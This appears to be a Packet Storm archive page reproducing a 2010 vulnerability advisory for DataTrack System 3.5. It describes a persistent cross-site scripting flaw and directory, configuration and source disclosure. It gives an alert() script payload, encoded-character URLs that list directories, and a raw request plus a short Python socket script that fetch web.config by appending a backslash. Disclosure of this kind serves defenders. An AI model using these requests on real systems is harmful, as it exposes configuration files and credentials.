what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

DataTrack System 3.5 Cross Site Scripting

DataTrack System 3.5 Cross Site Scripting
Posted May 19, 2010
Authored by AutoSec Tools

DataTrack System version 3.5 suffers from a persistent cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | b26e431c41faa90e692db047d4babce4e4f22b4a3f9015b26d0c293b9a73e8f9

DataTrack System 3.5 Cross Site Scripting

Change Mirror Download
#============================================================================================================#
# _ _ __ __ __ _______ _____ __ __ _____ _ _ _____ __ __ #
# /_/\ /\_\ /\_\ /\_\ /\_\ /\_______)\ ) ___ ( /_/\__/\ ) ___ ( /_/\ /\_\ /\_____\/_/\__/\ #
# ) ) )( ( ( \/_/( ( ( ( ( ( \(___ __\// /\_/\ \ ) ) ) ) )/ /\_/\ \ ) ) )( ( (( (_____/) ) ) ) ) #
# /_/ //\\ \_\ /\_\\ \_\ \ \_\ / / / / /_/ (_\ \ /_/ /_/ // /_/ (_\ \/_/ //\\ \_\\ \__\ /_/ /_/_/ #
# \ \ / \ / // / // / /__ / / /__ ( ( ( \ \ )_/ / / \ \ \_\/ \ \ )_/ / /\ \ / \ / // /__/_\ \ \ \ \ #
# )_) /\ (_(( (_(( (_____(( (_____( \ \ \ \ \/_\/ / )_) ) \ \/_\/ / )_) /\ (_(( (_____\)_) ) \ \ #
# \_\/ \/_/ \/_/ \/_____/ \/_____/ /_/_/ )_____( \_\/ )_____( \_\/ \/_/ \/_____/\_\/ \_\/ #
# #
#============================================================================================================#
# #
# Vulnerability............Persistent Cross-Site Scripting #
# Directory Disclosure #
# Configuration Disclosure #
# Source Disclosure #
# Software.................DataTrack System 3.5 #
# Download.................http://www.magnoware.com/Downloads.aspx #
# Date.....................5/17/10 #
# #
#============================================================================================================#
# #
# Site.....................http://cross-site-scripting.blogspot.com/ #
# Email....................john.leitch5@gmail.com #
# #
#============================================================================================================#
# #
# ##Description## #
# #
# User submitted data is not HTML entity encoded before it is rendered. #
# #
# #
# ##Exploit## #
# #
# Login using the web client and submit a request with summary set to <script>alert(0)</script>. Navigate #
# to My History to see the result. #
# #
#============================================================================================================#
# #
# ##Description## #
# #
# The contents of the root directory can be listed by using a specially crafted URL. #
# #
# #
# ##Exploit## #
# #
# %u0085 #
# %u00A0 #
# #
# #
# ##Proof of Concept## #
# #
# http://localhost/%u0085/ #
# http://localhost/%u00A0/ #
# #
#============================================================================================================#
# #
# ##Description## #
# #
# Forbidden file types (e.g. ascx, config) can be downloaded by appending a backslash to the filename. #
# #
# #
# ##Exploit## #
# #
# GET /web.config\ HTTP/1.1 #
# Host: localhost #
# #
# #
# ##Proof of Concept## #
# #
import socket
host ='localhost'
port = 80

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send('GET /web.config\ HTTP/1.1\r\n'\
'Host: ' + host + '\r\n\r\n')

while 1:
response = s.recv(8192)
if not response: break
print response
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    0 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close